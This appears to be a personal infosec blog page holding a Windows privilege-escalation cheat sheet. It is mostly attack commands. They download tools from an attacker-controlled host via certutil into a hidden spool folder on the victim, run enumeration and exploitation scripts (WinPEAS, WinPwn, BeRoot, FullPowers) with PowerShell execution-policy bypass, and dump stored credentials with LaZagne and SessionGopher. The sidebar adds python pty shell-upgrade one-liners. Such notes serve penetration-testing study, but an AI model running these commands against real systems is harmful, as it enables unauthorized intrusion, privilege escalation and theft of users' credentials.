akde/infosec

Information security is ultimately about managing risk

Windows privilege escalation scripts

,

Pre­pare the own system:

cd p151.general.1/scripts/privesc/windows
python -m SimpleHTTPServer 80

Pre­pare the target:

set NTPSRV=$ownIp
mkdir C:\Windows\System32\spool\drivers\color\wsc
cd C:\Windows\System32\spool\drivers\color\wsc

Down­load most scripts at once (>30 MB!):

certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe
certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip
7za.exe x _ex.zip

WinPeas

Github

winPEAS.bat
winPEASx86.exe
winPEASx64.exe

Powerless

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat
Powerless.bat

Windows Exploit Suggester NG

Github (Old ver­sion for old sys­tems)

On the vic­tim, exe­cute systeminfo and save its out­put on the local sys­tem. Then:

  1. python3 wes.py --update
  2. python3 wes.py /tmp/systeminfo

WinPWN

Github

  1. Update the repo first
    cd /opt/WinPwn && git pull && python -m SimpleHTTPServer 80
  2. On the tar­get:
    certutil.exe -urlcache -split -f "http://$NTPSRV/Offline_WinPwn.ps1" Offline_WinPwn.ps1
  3. Exe­cute:
    powershell -exec bypass
    Import-Module .\Offline_Winpwn.ps1
    WinPwn
    or
    powershell.exe -ExecutionPolicy ByPass -command "& { . Import-Module .\Offline_Winpwn.ps1; WinPwn }"

Sherlock

Github

JAWS

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/jaws-enum.ps1" jaws-enum.ps1
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

PowerSploit / PowerUp

See the blog post for it.

If Pow­er­shell is not avail­able. use SharpUp.

BeRoot

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/beRoot.exe" beRoot.exe
beRoot.exe

Seatbelt

certutil.exe -urlcache -split -f "http://$NTPSRV/seatbelt.exe" seatbelt.exe

See the Seat­belt post for more details.

FullPowers

Github

Works only for users with */local ser­vice or */network ser­vice (check whoami out­put) Opens a new shell with all ser­vice priv­i­leges set.

certutil.exe -urlcache -split -f "http://$NTPSRV/FullPowers.exe" FullPowers.exe
FullPowers.exe

Retrieving credentials

LaZagne

Github

Retrieves many cre­den­tials from var­i­ous software.

certutil.exe -urlcache -split -f "http://$NTPSRV/laZagne.exe" laZagne.exe
laZagne.exe all

SessionGopher

Github

certutil.exe -urlcache -split -f "http://$NTPSRV/SessionGopher.ps1" SessionGopher.ps1
powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "& { . .\SessionGopher.ps1; Invoke-SessionGopher -Thorough}"

Older scripts for older systems

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';